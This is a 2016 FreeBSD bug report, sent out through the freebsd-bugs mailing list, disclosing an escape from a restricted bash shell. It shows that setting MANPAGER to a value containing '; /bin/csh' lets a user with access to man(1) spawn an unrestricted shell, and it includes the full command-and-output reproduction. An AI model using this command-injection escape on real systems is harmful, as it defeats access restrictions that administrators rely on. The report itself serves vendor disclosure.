[Bug 206946] possibility to escape restricted shell using custom MANPAGER variable when user has access to man(1)

bugzilla-noreply at freebsd.org bugzilla-noreply at freebsd.org
Fri Feb 5 08:51:00 UTC 2016 

https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206946

            Bug ID: 206946
           Summary: possibility to escape restricted shell using custom
                    MANPAGER variable when user has access to man(1)
           Product: Base System
           Version: 10.2-RELEASE
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Many People
          Priority: ---
         Component: bin
          Assignee: freebsd-bugs at FreeBSD.org
          Reporter: ilavsky.martin at gmail.com

OS: FreeBSD 10.2 amd64 (but works on other versions/archs too). 

User is set as: 

# pw user show whoo
whoo:<passwd hash>/:1002:1002::0:0:User &:/home/whoo:/usr/local/bin/rbash
#

# pwd; ls -lad . .bash*
/home/whoo
drwx------  3 whoo  whoo    15 Feb  4 20:55 .
-rw-------  1 whoo  whoo  1677 Feb  4 23:54 .bash_history
-rw-r--r--  1 root  whoo    35 Feb  4 20:56 .bash_profile
#

# grep PATH .bash_profile
PATH="/home/whoo/bin"
export PATH
#
# ls -la /home/whoo/bin/
total 130
drwxr-xr-x  2 root  whoo        4 Feb  4 23:43 .
drwx------  3 whoo  whoo       15 Feb  4 20:55 ..
-r-xr-xr-x  1 root  wheel   21082 Feb  4 23:42 man
-r-xr-xr-x  1 root  wheel  150216 Sep  4 16:07 more
#

man and more are copied from FreeBSD's /usr/bin. 
When logged as user `whoo':

$ cd /
-rbash: cd: restricted
$

$ find
-rbash: find: command not found
$

$ ls
-rbash: ls: command not found
$

$ unset PATH
-rbash: unset: PATH: cannot unset: readonly variable
$


But with specially set MANPAGER:

$ export MANPAGER="/usr/bin/less ; /bin/csh"
$

$ man man
/home/whoo/bin/man: head: not found
eval: tbl: not found
eval: groff: not found
whoo at tbsd01:~ % 

whoo at tbsd01:~ % setenv PATH "/bin:/usr/bin:/sbin:/usr/sbin"
whoo at tbsd01:~ %

whoo at tbsd01:~ % cd /
whoo at tbsd01:/ % ls -la | head -6
total 138
drwxr-xr-x  22 root  wheel    28 Jan 15 14:26 .
drwxr-xr-x  22 root  wheel    28 Jan 15 14:26 ..
-rw-r--r--   2 root  wheel   966 Nov 11  2014 .cshrc
-rw-r--r--   2 root  wheel   254 Nov 11  2014 .profile
-rw-------   1 root  wheel  1024 Feb 24  2015 .rnd
whoo at tbsd01:/ %

whoo at tbsd01:/tmp % ls
blob00                          conftest79193                  
install.dMvSoF9f                mc-root                        
mergemaster.mtree.fDhpjfhQ      screens
whoo at tbsd01:/tmp %

-- 
You are receiving this mail because:
You are the assignee for the bug.

More information about the freebsd-bugs mailing list